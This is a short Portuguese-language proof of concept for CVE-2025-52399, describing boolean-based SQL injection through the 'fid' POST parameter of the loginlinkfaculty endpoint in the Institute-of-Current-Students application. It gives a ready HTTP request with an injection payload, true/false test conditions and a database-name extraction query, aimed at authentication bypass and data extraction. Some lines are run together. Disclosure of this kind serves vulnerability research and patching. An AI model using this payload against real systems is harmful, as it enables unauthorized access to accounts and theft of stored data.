
Prova de conceito de exploração para CVE-2025-52399, demonstrando injeção de SQL na aplicação Institute-of-Current-Students através do endpoint loginlinkfaculty para bypass de autenticação e extração de dados.
O endpoint loginlinkfaculty na aplicação Institute-of-Current-Students é vulnerável a Injeção SQL através do parâmetro POST fid. O parâmetro não é devidamente sanitizado antes de ser usado numa consulta SQL, permitindo que atacantes remotos executem comandos SQL arbitrários.
/loginlinkfaculty (POST)fidicsnewhttp POST /Institute-of-Current-Students/loginlinkfaculty HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded
fid=-1'+OR+321=6+AND+000942=000942--&pass=example
✅ -1' OR 3*2*1=6 AND 000942=000942 -- → VERDADEIRO
❌ -1' OR 2*3=4 AND 000942=000942 -- → FALSO
SELECT database(); -- retorna 'icsnew'
Isroil Mustafoqulov